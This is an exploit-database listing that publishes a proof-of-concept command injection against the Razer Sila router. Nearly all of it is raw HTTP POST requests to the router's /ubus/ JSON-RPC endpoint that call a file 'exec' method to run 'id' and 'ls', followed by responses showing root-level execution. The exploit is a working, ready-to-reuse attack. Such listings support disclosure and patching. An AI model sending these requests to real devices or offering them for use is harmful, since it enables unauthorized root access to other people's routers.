Advertisement
CVE | Category | Price | Severity |
---|---|---|---|
CWE-78 | Not specified | Unknown |
Author | Risk | Exploitation Type | Date |
---|---|---|---|
Unknown | Unknown | Remote | 2022-04-11 |
CVSS | EPSS | EPSSP |
---|---|---|
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H | 0.02192 | 0.50148 |
# Exploit Title: Razer Sila - Command Injection # Google Dork: N/A # Date: 4/9/2022 # Exploit Author: Kevin Randall # Vendor Homepage: https://www2.razer.com/ap-en/desktops-and-networking/razer-sila # Software Link: https://www2.razer.com/ap-en/desktops-and-networking/razer-sila # Version: RazerSila-2.0.441_api-2.0.418 # Tested on: Razer Sila Router # CVE N/A # Proof of Concept # Request POST /ubus/ HTTP/1.1 Host: 192.168.8.1 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0 Accept: */* Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Content-Length: 117 Origin: https://192.168.8.1 Referer: https://192.168.8.1/ Te: trailers Connection: close {"jsonrpc":"2.0","id":3,"method":"call","params":["30ebdc7dd1f519beb4b2175e9dd8463e","file","exec",{"command":"id"}]} # Response HTTP/1.1 200 OK Connection: close Content-Type: application/json Content-Length: 85 {"jsonrpc":"2.0","id":3,"result":[0,{"code":0,"stdout":"uid=0(root) gid=0(root)\n"}]} # Request POST /ubus/ HTTP/1.1 Host: 192.168.8.1 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0 Accept: */* Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Content-Length: 117 Origin: https://192.168.8.1 Referer: https://192.168.8.1/ Te: trailers Connection: close {"jsonrpc":"2.0","id":3,"method":"call","params":["30ebdc7dd1f519beb4b2175e9dd8463e","file","exec",{"command":"ls"}]} # Response HTTP/1.1 200 OK Connection: close Content-Type: application/json Content-Length: 172 {"jsonrpc":"2.0","id":3,"result":[0,{"code":0,"stdout":"bin\ndev\netc\nhome\ninit\nlib\nmnt\nno_gui\noverlay\nproc\nrom\nroot\nsbin\nservices\nsys\ntmp\nusr\nvar\nwww\n"}]}
Copyright ©2024 Exploitalert.
All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use.